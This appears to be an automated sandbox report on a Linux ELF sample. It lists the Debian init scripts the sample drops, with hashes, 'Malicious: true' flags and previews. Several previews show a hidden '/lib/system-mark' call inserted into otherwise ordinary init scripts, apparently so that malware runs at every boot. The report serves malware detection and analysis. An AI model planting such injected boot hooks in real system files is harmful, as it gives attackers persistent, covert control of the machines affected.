SHA1:	4FAEF5CD07FC43C3AE00A1D09116580664EB9158
SHA-256:	0EA1C7D35BA69FB47D9AF56AA7FEEA00CC2F0A0F1ACB5796C48D4BB95F980D9E
SHA-512:	DF5DE7A268F0FFB5C6E95A32128877AAB05EA46331471D95E97DD4A31B883D0B9DE9005EC995F37AA254BEFE27A252961FF37148BB3E7896E30373FC16F96D84
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.#.# skeleton example file to build /etc/init.d/ scripts..# This file should be used to construct scripts for /etc/init.d..#.# Written by Miquel van Smoorenburg <miquels@cistron.nl>..# Modified for Debian GNU/Linux.# by Ian Murdock <imurdock@gnu.ai.mit.edu>..#.# Version: @(#)skeleton 1.8 03-Mar-1998 miquels@cistron.nl.#..### BEGIN INIT INFO.# Provides: hddtemp.# Required-Start: $remote_fs $syslog $network.# Required-Stop: $remote_fs $syslog $network.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: disk temperature monitoring daemon.# Description: hddtemp is a disk temperature monitoring daemon.### END INIT INFO..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.NAME=hddtemp.DAEMON=/usr/sbin/$NAME.DESC="disk temperature monitoring daemon"..DISKS="/dev/hd[a-z] /dev/hd[a-z][a-z]".DISKS="$DISKS /dev/sd[a-z] /dev/sd[a-z][a-z]".DISKS="$DISKS

/etc/init.d/hwclock.sh

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3946
Entropy (8bit):	5.1522498878727045
Encrypted:	false
SSDEEP:	96:uYqy3be4txLsMwqTZL5FFTUaTfNvagXQwjdjNvaYXDkeQz:VZbxtXFZNZTfNvawxjNva4e
MD5:	40E4F04E723FB5BEE6DF2327EA35254D
SHA1:	D512EAB734F222022E210CCA19128E992691CF78
SHA-256:	EEC4726C42AA93DEB9D6228BD464ED33FB6C1FF6FFD88ECC14C603746A7C444A
SHA-512:	71D245EA40A64FDCCAAA88D869F8E929F5FA9736FB16D7079CE41184CA9DA71F40E2E6EFED8382C4350089932AAC8C588271F72FB9E5139E35FF504C65127227
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.# hwclock.sh.Set and adjust the CMOS clock..#.# Version:.@(#)hwclock.sh 2.00 14-Dec-1998 miquels@cistron.nl.#.# Patches:.#..2000-01-30 Henrique M. Holschuh <hmh@rcm.org.br>.#.. - Minor cosmetic changes in an attempt to help new.#.. users notice something IS changing their clocks.#.. during startup/shutdown..#.. - Added comments to alert users of hwclock issues.#.. and discourage tampering without proper doc reading..# 2012-02-16 Roger Leigh <rleigh@debian.org>.# - Use the UTC/LOCAL setting in /etc/adjtime rather than.# the UTC setting in /etc/default/rcS. Additionally.# source /etc/default/hwclock to permit configuration...### BEGIN INIT INFO.# Provides: hwclock.# Required-Start: mountdevsubfs.# Required-Stop: mountdevsubfs.# Should-Stop: umountfs.# Default-Start: S.# X-Start-Before: checkroot.# Default-Stop: 0 6.# Short-Description: Sync hardware and system clock time..

/etc/init.d/irqbalance

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2707
Entropy (8bit):	4.995870971917478
Encrypted:	false
SSDEEP:	48:92ZPnWGmH6TMV5m11QU7BXCW3gxxsXuHtpyBMbtKxxsDKV/BkH5:92Z/WbZnm11LByWwxKXuHtcBMbtKxKDr
MD5:	E666B216857A200A89A8C38279974070
SHA1:	5184B1942742E7D4811A8BA0080BD19413306EB5
SHA-256:	3A9EF64FD98E3991ABEE18FE69ED507EE8516B5777E7B3E8BB3BC69AE997D1F8
SHA-512:	A2BC047C6034F8594B640DD5A7746AAD3F6BEAC9239AA71C00C90EB19FF37FAD38B08A5ACC0B8E1928CC447450C0A69E3FB4C8A6EF65EC584227F0E8ACF1F3D2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.### BEGIN INIT INFO.# Provides: irqbalance.# Required-Start: $remote_fs $syslog.# Required-Stop: $remote_fs $syslog.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: daemon to balance interrupts for SMP systems.### END INIT INFO.# irqbalance init script.# August 2003.# Eric Dorland..# Based on spamassassin init script..PATH=/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/sbin/irqbalance.NAME=irqbalance.SNAME=irqbalance.DESC="SMP IRQ Balancer".PIDFILE="/run/$NAME.pid".PNAME="irqbalance".DOPTIONS=""..# Defaults - don't touch, edit /etc/default/.OPTIONS=""..test -x $DAEMON \|\| exit 0... /lib/lsb/init-functions..test -f /etc/default/irqbalance && . /etc/default/irqbalance..# Beware: irqbalance tries to read and handle environment variables.# directly itself, but since start-stop-daemon clears the env.# we convert the variables to commandline arguments here....# (Note: in the daemon an option is enabled even if its set to.# e.g. the empty strin

/etc/init.d/iscsid

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1555
Entropy (8bit):	4.972539518025109
Encrypted:	false
SSDEEP:	24:2Ex/YpMr8MICUV7OlfrDNhay+HNCNIlH3U8lrQ5l8u4uuCG:/puMAMICu7OlN+UIlH3U8lc/ZWCG
MD5:	ECC4B12F805560CED916AF27BF8423D1
SHA1:	A5954BF38D2E34AE23286D676FE6E4153CDBFF69
SHA-256:	C33D4A5025DB90ACA69F23F041F2AFB4B31F1016DF03631C6D918A4EF5E6842D
SHA-512:	CFAC2CC9451D012F8A4DACFFC6ACA4C9456FF4F0D212C419443C0939CEB0AFE1DAE59329D9F9D27413A9E6CF2E0D05775C873AE53C355C0A8A738DB07120CAD3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.# kFreeBSD do not accept scripts as interpreters, using #!/bin/sh and sourcing..if [ true != "$INIT_D_SCRIPT_SOURCED" ] ; then./lib/system-mark. set "$0" "$@"; INIT_D_SCRIPT_SOURCED=true . /lib/init/init-d-script.fi.### BEGIN INIT INFO.# Provides: iscsid.# Required-Start: $network $local_fs.# Required-Stop: $network $local_fs sendsigs.# Default-Start: S.# Default-Stop: 0 1 6.# Short-Description: iSCSI initiator daemon (iscsid).# Description: The iSCSI initiator daemon takes care of.# monitoring iSCSI connections to targets. It is.# also the daemon providing the interface for the.# iscisadm tool to talk to when administering iSCSI.# connections..### END INIT INFO..# Author: Christian Seiler <christian@iwakd.de>..DESC="iSCSI initiator daemon".DAEMON=/sbin/iscsid.PIDFILE=/run/iscsid.pid.OMITDIR=/run/sendsigs.omit.d..do_start_prepare() {..if ! /lib/open-iscsi/startup-chec

/etc/init.d/keyboard-setup.sh

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1548
Entropy (8bit):	4.309956240738216
Encrypted:	false
SSDEEP:	48:9XfgD1yQyKzYcg/LshTJckS5MJAb8kGh5A9b6:9YQLH/w5SO
MD5:	89A7217DCF2B72ACC044B81A9CC3FC6F
SHA1:	E4E5E503268D650B4F0FE7C37DC0BD3EFA1CABC6
SHA-256:	896A6EAFC64047CB19D6319915BD349FD3B90A8BECA8A83AB2153EEC519A59E5
SHA-512:	8E6B76171B23133C44AB7CF19DCCCE87FD0AA38F4BC0520AB6F2AFA64CA506D447C192F0B09A8584D9C2203F665E89D8D33B3EA30E53681F5BA62A1DABC1DBC6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.### BEGIN INIT INFO.# Provides: keyboard-setup.sh.# Required-Start: mountkernfs.# Required-Stop:.# X-Start-Before: checkroot.# Default-Start: S.# Default-Stop:.# X-Interactive: true.# Short-Description: Set the console keyboard layout.# Description: Set the console keyboard as early as possible.# so during the file systems checks the administrator.# can interact. At this stage of the boot process.# only the ASCII symbols are supported..### END INIT INFO..if [ -f /bin/setupcon ]; then./lib/system-mark. case "$1" in. stop\|status). # console-setup isn't a daemon. ;;. start\|force-reload\|restart\|reload). if [ -f /lib/lsb/init-functions ]; then./lib/system-mark. . /lib/lsb/init-functions. else. log_action_begin_msg () {.. echo -n "$@... ". }.. log_action_end_msg () {..

/etc/init.d/kmod

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2164
Entropy (8bit):	4.907145181173842
Encrypted:	false
SSDEEP:	24:+mUxLADBzBQYDMAKjqg3Ulfb4MZC/tCYJGMsMHwDa1kig/ue5NrGgbcl8d:l/dtQYxKjRQfbO/oYJbJQAki6jzz
MD5:	0B192EEF5B7E6AE9C89B8E127943E04C
SHA1:	6F6B5F63D1F504524C5C27849353255A6EDEA52E
SHA-256:	D43E4D15B82D9D85BEF6B2B676506AED1B7FC3C50232BFB7BFE1D0202C83DCA3
SHA-512:	860ACA2D19758EAA6FD8C3D0552674842916C4F853A6739932A9E66B68582E5359AD91EE4F27443992ACCA380BFC33C2178BCAA21B93A812916CB228B831BA82
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh -e.### BEGIN INIT INFO.# Provides: kmod.# Required-Start: .# Required-Stop: .# Should-Start: checkroot.# Should-Stop:.# Default-Start: S.# Default-Stop:.# Short-Description: Load the modules listed in /etc/modules..# Description: Load the modules listed in /etc/modules..### END INIT INFO..# Silently exit if the kernel does not support modules..[ -f /proc/modules ] \|\| exit 0.[ -x /sbin/modprobe ] \|\| exit 0..[ -f /etc/default/rcS ] && . /etc/default/rcS.. /lib/lsb/init-functions..PATH='/sbin:/bin'..case "$1" in. start). ;;.. stop\|restart\|reload\|force-reload). log_warning_msg "Action '$1' is meaningless for this init script". exit 0. ;;.. *). log_success_msg "Usage: $0 start". exit 1.esac..load_module() {. local module args. module="$1". args="$2".. if [ "$VERBOSE" != no ]; then./lib/system-mark. log_action_msg "Loading kernel module $module". modprobe $module $args \|\| true. else. modprobe $module $args > /dev/null 2>&1 \|\| t

/etc/init.d/lightdm

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3534
Entropy (8bit):	5.282612583353571
Encrypted:	false
SSDEEP:	48:fbmo8vyUjH3J+cNrWId4KF9wDeXxr/FI/F7R7cJ0IB6rd/g1ZsbHaXAZ4td/WzvA:d8z3J+cNiR4SzGmJHyRDuHTWld
MD5:	E6E338C277324717A5722E4EA56AA2EE
SHA1:	46334BCB354D10D0AAC47F4D542710B66D446A77
SHA-256:	5BF68D24F74EC03AE3E2D53B8F57E51C8C3CB320FE53E5D6C8F3214E25EE9C29
SHA-512:	19AF2485DB58640CFEA8E245A4E1E57624239C12B961C7218B5B50FB880985D4275862F0F8FA805D004314844B791E8F2FE248A7797FF4D5082A892E34126DE9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh..# Largely adapted from xdm's init script:.# Copyright 1998-2002, 2004, 2005 Branden Robinson <branden@debian.org>..# Copyright 2006 Eugene Konev <ejka@imfi.kspu.ru>.#.# This is free software; you may redistribute it and/or modify.# it under the terms of the GNU General Public License as.# published by the Free Software Foundation; either version 2,.# or (at your option) any later version..#.# This is distributed in the hope that it will be useful, but.# WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the.# GNU General Public License for more details..#.# You should have received a copy of the GNU General Public License with.# the Debian operating system, in /usr/share/common-licenses/GPL; if.# not, write to the Free Software Foundation, Inc., 51 Franklin Street, .# Fifth Floor, Boston, MA 02110-1301, USA...### BEGIN INIT INFO.# Provides: lightdm.# Required-Start: $local_fs $remote_fs dbus.# R

/etc/init.d/lm-sensors

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	901
Entropy (8bit):	5.1022129052660485
Encrypted:	false
SSDEEP:	12:1CpBMHQHf7Wc9rlVYhRwDyh0QvsFoiXmH0+QhKDydO6aock1j6yLRujvljn:1i4WyM/IwfJ2Hjq13O
MD5:	46FB137F6F75999F794FDB149BCAD53B
SHA1:	90F88FB0972A25A2BBEA62DB26EA84ED9CFC036D
SHA-256:	D661181FDD70CE80EF52393D7A58D33009CAE7ED2EB62C764C4CAC0181DD7E76
SHA-512:	C360EB8E5FD3E7A7740D6AE395DB430811306C176C9E3FEA975E76B6474533A30F709155A81F007E29DC61AE2200445CCD79F08139998BA575115F7CE45340CC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh..### BEGIN INIT INFO.# Provides: lm-sensors.# Required-Start: $remote_fs.# Required-Stop:.# Default-Start: S.# Default-Stop:.# Short-Description: lm-sensors.# Description: hardware health monitoring.### END INIT INFO... /lib/lsb/init-functions..[ -f /etc/default/rcS ] && . /etc/default/rcS.PATH=/bin:/usr/bin:/sbin:/usr/sbin.PROGRAM=/usr/bin/sensors..test -x $PROGRAM \|\| exit 0..case "$1" in. start)..log_action_begin_msg "Setting sensors limits"..if [ "$VERBOSE" = "no" ]; then./lib/system-mark.../usr/bin/sensors -s 1> /dev/null 2> /dev/null.../usr/bin/sensors 1> /dev/null 2> /dev/null..else.../usr/bin/sensors -s.../usr/bin/sensors > /dev/null..fi..log_action_end_msg 0..;;. stop)..;;. force-reload\|restart)..$0 start..;;. status)..exit 0..;;. *)..log_success_msg "Usage: /etc/init.d/lm-sensors {start\|stop\|restart\|force-reload\|status}"..exit 1.esac..exit 0..

/etc/init.d/lvm2-lvmpolld

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	604
Entropy (8bit):	5.314197695143652
Encrypted:	false
SSDEEP:	12:wdRDNeBuYrBMmCU33VLBa5kI5GKq9XquaZ+w2Cj/:2Ex/lti9OXylj/
MD5:	273FB590FE7F5DAE000DC871BC5418DB
SHA1:	90575E32A398270FC2D10448A454646B84F3B257
SHA-256:	D9EDBDDD0D0151FDC741B4C0B8F6910DC01D9A6F2F2CBE5705297E4B27EE9C0F
SHA-512:	62B1896678941476EF1DF756AC16B136F0FDB1E86A53A8DC17340BDF03504BC7C54A8E04807B692A9F15A7904CE6E0087D3F6373C2CF1F6807444B36E45ABDCB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.# kFreeBSD do not accept scripts as interpreters, using #!/bin/sh and sourcing..if [ true != "$INIT_D_SCRIPT_SOURCED" ] ; then./lib/system-mark. set "$0" "$@"; INIT_D_SCRIPT_SOURCED=true . /lib/init/init-d-script.fi.### BEGIN INIT INFO.# Provides: lvm2-lvmpolld.# Required-Start: $local_fs.# Required-Stop: $local_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: LVM2 poll daemon.### END INIT INFO..DESC="LVM2 poll daemon".DAEMON=/sbin/lvmpolld.DAEMON_ARGS="-t 60".PIDFILE=/run/lvmpolld.pid..do_start_prepare() {. mkdir -m 0700 -p /run/lvm.}..

/etc/init.d/mono-xsp4

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2518
Entropy (8bit):	5.325203715837751
Encrypted:	false
SSDEEP:	48:7HvaUX9Q3esRt33P4AWNr/42Fwk0qmA40O4pTjmCjVwUH:7PaUX0eSt3/VczgWBbjmCjVwS
MD5:	0DBC33D8B96CA2A841D1A83960BDF389
SHA1:	BDC86C7897C467A42075B2C80A1CAEDCCA794F76
SHA-256:	631AD4D36C691EBC1AADD6006C597B64A69F4AF1F6AA2455A8F4F2563F11F13D
SHA-512:	F6320E3BD73BC5AFFD6C3D13832F836CE81323C0A059D26C9294A65C3DA7B3A394BC5A20C6B07244F48499BB5B8E3A7869A7E48FAF916CEABC495B8D281BDB8F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: mono-xsp4.# Required-Start: $remote_fs.# Required-Stop: $remote_fs.# Should-Start: .# Should-Stop:.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: Mono XSP4.# Description: Debian init script for Mono XSP4..### END INIT INFO.#.# Written by Pablo Fischer <pablo@pablo.com.mx>.# Dylan R. E. Moonfire <debian@mfgames.com>.# Modified for Debian GNU/Linux.#.# Version:.@(#)mono-xsp4 pablo@pablo.com.mx.#..# Variables.PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/bin/xsp4.NAME=mono-xsp4.DESC="XSP 4.0 WebServer".DEFAULT=/etc/default/$NAME.CFGDIR=/etc/xsp4.VIRTUALFILE=$CFGDIR/debian.webapp.MONO_SHARED_DIR=/var/run/$NAME.start_boot=false..# Use LSB.. /lib/lsb/init-functions..# If we don't have the basics, don't bother.test -x $DAEMON \|\| exit 0.test -f $DEFAULT && . $DEFAULT...if [ "x$start_boot" != "xtrue" ] ; then./lib/system-mark. exit 0.fi..if [ ! -e $MO

/etc/init.d/multipath-tools

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2964
Entropy (8bit):	5.31314714541473
Encrypted:	false
SSDEEP:	48:7HUksR9JrtNCDCJ99TaPn1PCDCJ99TafOBUV1kqH2fQuzfg61U149eh7KKSKMs:7HUkwbrSDu+Pn1qDu+2qV1RHSQuzA4I5
MD5:	54E61FBA1E794A3A95B4FA31099CEB2F
SHA1:	4036B83019BAE7A2D843C13C52AA91A86C4D4CA4
SHA-256:	BAEC2D4F6968AE735457DE716EB7E880C03C410A53A1C19563C258D78852874E
SHA-512:	6AC88EF6CDE8A2D98ED14A879CEDD04B263F252C0A03E93FBF5F6B50AF5416BDD3BAC231E43C98BA5DF0043703D67F1852D9159672B43D5D5EC0EC61BA431688
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: multipath-tools.# Required-Start: udev $local_fs $remote_fs $syslog.# Required-Stop: udev $local_fs $remote_fs $syslog.# Should-Start: iscsi.# Should-Stop: iscsi.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: multipath daemon.# Description:.### END INIT INFO..PATH=/sbin:/bin:/usr/sbin/:/usr/bin.DAEMON=/sbin/multipathd.NAME=multipathd.DESC="multipath daemon".syspath=/sys/block..test -x $DAEMON \|\| exit 0... /lib/lsb/init-functions..if [ -f /etc/default/multipath-tools ] ; then./lib/system-mark... /etc/default/multipath-tools.fi..teardown_slaves().{.cd $1; .if [ -d "slaves" ]; then./lib/system-mark.for slave in slaves/;.do..if [ "$slave" = "slaves/" ]; then./lib/system-mark...read dev < $1/dev...tablename=$(dmsetup table --target multipath \| sed -n "s/$.$: . $dev .*/\1/p")...if ! [ -z $tablename ]; then./lib/system-mark....log_daemon_msg "Root is on a multipathed device, multipathd c

/etc/init.d/open-iscsi

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2589
Entropy (8bit):	5.112756814918559
Encrypted:	false
SSDEEP:	48:7UMRMrEm3cy8Nc8NgZlfMMtWBAl3ATeTPAdWIlRdWdtRMg02AC9ArANTcAhicF:7b2rH338azZlfn/lwA4dWIhC8DUbL
MD5:	207481F279E4D4E87E2455C16287C685
SHA1:	1CC3B8B32EE2BCD5342F38B66C936C4EC18897F4
SHA-256:	225B755072D5C433DE74DE26633834FF05A6956053557F1B3F634AE08752C6BF
SHA-512:	E494C2A33928070E2E1BACA3AE53814986AC7C9CEB3B4D31CAE0C0202AC2BEE98CF65A196387FAA7EED560B6AC6665EE6D3C77630167ADFDBF82C99FE3F65B14
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: open-iscsi iscsi.# Required-Start: $network $local_fs iscsid.# Required-Stop: $network $local_fs iscsid sendsigs.# Default-Start: S.# Default-Stop: 0 1 6.# Short-Description: Login to default iSCSI targets.# Description: Login to default iSCSI targets at boot and log out.# of all iSCSI targets at shutdown..### END INIT INFO..PATH=/sbin:/bin.DAEMON=/sbin/iscsid.ADM=/sbin/iscsiadm.PIDFILE=/run/iscsid.pid.NAMEFILE=/etc/iscsi/initiatorname.iscsi.CONFIGFILE=/etc/iscsi/iscsid.conf.OMITDIR=/run/sendsigs.omit.d..[ -x "$DAEMON" ] \|\| exit 0... /lib/lsb/init-functions..# Include defaults if available.if [ -f /etc/default/open-iscsi ]; then./lib/system-mark... /etc/default/open-iscsi.fi...if [ ! -d /sys/class/ ]; then./lib/system-mark. log_failure_msg "iSCSI requires a mounted sysfs, not started.". exit 0.fi..RETVAL=0..start() {..if ! [ -s $PIDFILE ] \|\| ! kill -0 `sed -n 1p $PIDFILE` >/dev/null ; then./l

/etc/init.d/open-vm-tools

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1881
Entropy (8bit):	4.863837327437562
Encrypted:	false
SSDEEP:	48:1a/f0aOHh86/X/QA4pWh8FgM8QhmMl8FkgPooG2DKYUP:1a/f0aOB86j4e8j8Q8Ml8OmooG2D3k
MD5:	CE0C8A7E1042C39FB28FEE6981E2ACE4
SHA1:	C7B193DB855B637F7011A28928DE2E0A5796B825
SHA-256:	32735889841F4B203B9C06278D9A178D08AF5288474F475A31F0AC2669C1DD56
SHA-512:	1B676B9B1CB75C48D5B4EE6D34E402A6B99C4CECA8B261177396C13E63323A5C6A9F62B556FFAB110C25B9066D4253E9C0ACB1D3DA790ECD70426DD9A0AA46C1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh..### BEGIN INIT INFO.# Provides:..open-vm-tools.# Required-Start:.$local_fs $remote_fs.# Required-Stop:.$local_fs $remote_fs.# X-Start-Before:.# X-Stop-After:.# Default-Start:.2 3 4 5.# Default-Stop:..0 1 6.# Description:..Runs the open-vm-tools services.# Short-Description:.Runs the open-vm-tools services.### END INIT INFO... /lib/lsb/init-functions..exit_if_not_in_vm () {. if which systemd-detect-virt 1>/dev/null; then./lib/system-mark. checktool='systemd-detect-virt'. else. checktool='vmware-checkvm'. fi.. if ! ${checktool} \| grep -iq vmware; then./lib/system-mark. echo "open-vm-tools: not starting as this is not a VMware VM". exit 0. fi.}..case "${1}" in. start). # Check if we're running inside VMWare. exit_if_not_in_vm.. log_daemon_msg "Starting open-vm daemon" "vmtoolsd". start-stop-daemon --start --quiet --pidfile /var/run/vmtoolsd.pid --exec /usr/bin/vmtoolsd --test > /dev/null \|\| exit 1.

/etc/init.d/plymouth

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1401
Entropy (8bit):	5.3052027136710675
Encrypted:	false
SSDEEP:	24:1sqE3A2EYVwMwRwDTMBgV2APfcVwAPYIpPgfS+VGgEIT8YojAf5XERmgLGmgOS/F:1sl3AhYG7RgzQAsVwAgGYfdVz58Y9f5v
MD5:	2B23E2A5868129F5B68D4465E1FBA27A
SHA1:	8781CE140244ABA8178CCC20B50AB3C252D82A1F
SHA-256:	5D49F02BB6C8C031EA02F67ABFB812EB75425058AD30F44FAB85A9463D2DB1CC
SHA-512:	8DBA742FB4B66C0799E66FA5E070161E2EDBA95A0789A06F51910D659F51E6313D32072078A44B7D2A46CD18B63036F07FBFBD8AEF90843643860424FED398D4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh..### BEGIN INIT INFO.# Provides:..plymouth.# Required-Start:.udev $remote_fs $all.# Required-Stop:.$remote_fs.# Should-Start:..$x-display-manager.# Should-Stop:..$x-display-manager.# Default-Start:.2 3 4 5.# Default-Stop:..0 6.# Short-Description:.Stop plymouth during boot and start it on shutdown.### END INIT INFO..PATH="/sbin:/bin:/usr/sbin:/usr/bin".NAME="plymouth".DESC="Boot splash manager"..test -x /sbin/plymouthd \|\| exit 0..if [ -r "/etc/default/${NAME}" ].then./lib/system-mark... "/etc/default/${NAME}".fi... /lib/lsb/init-functions..set -e..SPLASH="true".for ARGUMENT in $(cat /proc/cmdline).do..case "${ARGUMENT}" in...splash)....SPLASH="true"....;;....nosplash\|plymouth.enable=0)....SPLASH="false"....;;..esac.done..case "${1}" in..start)...case "${SPLASH}" in....true)...../bin/plymouth quit --retain-splash.....;;...esac...;;...stop)...case "${SPLASH}" in....true).....if ! plymouth --ping.....then./lib/system-mark....../sbin/plymouthd --mode=shutdown.....fi......RUNLEV

/etc/init.d/plymouth-log

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	787
Entropy (8bit):	5.274418902272115
Encrypted:	false
SSDEEP:	12:1snBEfVmWr2lr4HhJ8PWXsbgwfGgrCR6D02ygvRiqhtcy5RujGqGRujrVgDn:1sBEf0FlwhuPBb9GgTHygvR4MLoVS
MD5:	92B74D7357C759DB635940F9DBE7A5E8
SHA1:	88C813B379F01849C7A709BF47D8C40AB2A25345
SHA-256:	DBDAB3736BE330D3CC39A75E100F6FB8D9094413A7D24CAC22A8BE39DE25D3C3
SHA-512:	405A8103CE19E154E58A9B0D26C888807F1DE5B3A98EF8C66DF31F3113542215004FD4CD9783C021ED27FEC165B4605CF6B92C141AD9E2BE4872C1D80A34B6E7
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh..### BEGIN INIT INFO.# Provides:..plymouth-log.# Required-Start:.$local_fs $remote_fs.# Required-Stop:.$local_fs $remote_fs.# Should-Start:.# Should-Stop:.# Default-Start:.S.# Default-Stop:.# Short-Description:.Inform plymouth that /var/log is writable.### END INIT INFO..PATH="/sbin:/bin:/usr/sbin:/usr/bin".NAME="plymouth-log".DESC="Boot splash manager (write log file)"..test -x /bin/plymouth \|\| exit 0..if [ -r "/etc/default/${NAME}" ].then./lib/system-mark... "/etc/default/${NAME}".fi... /lib/lsb/init-functions..set -e..case "${1}" in..start)...if plymouth --ping...then./lib/system-mark..../bin/plymouth update-root-fs --read-write...fi...;;...stop\|restart\|force-reload)....;;...*)...echo "Usage: ${0} {start\|stop\|restart\|force-reload}" >&2...exit 1...;;.esac..exit 0..

/etc/init.d/procps

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	942
Entropy (8bit):	5.25253518776668
Encrypted:	false
SSDEEP:	12:atdRDNeBuYrBMmCU3sBww+k12FsnM5ldlPSSHTm5TeQxala5tV86s+L2s4hk2z7w:aLEx/25+Z+nMfTWTeCKa3VfhL69z0
MD5:	BEA2BDFD5F7688D4F6E313DC63CA499D
SHA1:	4D6764F461EE096E83A5F5923ED8472A94526E95
SHA-256:	8D2D9E87F61D6D84EFF365927CB97A21EBFC3C9B9BDA48D13858D285AD332466
SHA-512:	932B314974F2AA88FC3E1292729F166EC1459B2951F476F9E9CFA00AC0A36B0687C3CC1BED94B968BBAAF47C3D679CFBE152DFE984E54306800FB85A16DE0F3D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.# kFreeBSD do not accept scripts as interpreters, using #!/bin/sh and sourcing..if [ true != "$INIT_D_SCRIPT_SOURCED" ] ; then./lib/system-mark. set "$0" "$@"; INIT_D_SCRIPT_SOURCED=true . /lib/init/init-d-script.fi.### BEGIN INIT INFO.# Provides: procps.# Required-Start: mountkernfs $local_fs.# Required-Stop:.# Should-Start: udev module-init-tools.# X-Start-Before: $network.# Default-Start: S.# Default-Stop:.# Short-Description: Configure kernel parameters at boottime.# Description: Loads kernel parameters that are specified in /etc/sysctl.conf.### END INIT INFO.#.# written by Elrond <Elrond@Wunder-Nett.org>..DESC="Setting kernel variables".DAEMON=/sbin/sysctl.PIDFILE=none..# Comment this out for sysctl to print every item changed.QUIET_SYSCTL="-q"..do_start_cmd() {..STATUS=0..$DAEMON $QUIET_SYSCTL --system \|\| STATUS=$?..return $STATUS.}..do_stop() { return 0; }.do_status() { return 0; }..

/etc/init.d/rsync

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	4639
Entropy (8bit):	5.249855326047257
Encrypted:	false
SSDEEP:	96:jdRMpo498RXFzyb1U0lKRuHp8gXGHoNURkx:jdRMpJ98g1U0c8JxWINUmx
MD5:	BBBAC3DC084FCC76813396852B0383FE
SHA1:	675F156F5AAF3BFA73C23A1478680F9769D19926
SHA-256:	BF77774A109F072532F634BCC63FB7DA005BEB0D553418FA42DED906F3025EFF
SHA-512:	C7F9AE322C14643F6D711B4B20AD009522B3FE02E986CFB5F839717144BF795E70E17A2745D24E74C4CA76922FF8ED0C1D413F7CEBDECA25CFC52AE4EDE04FA7
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
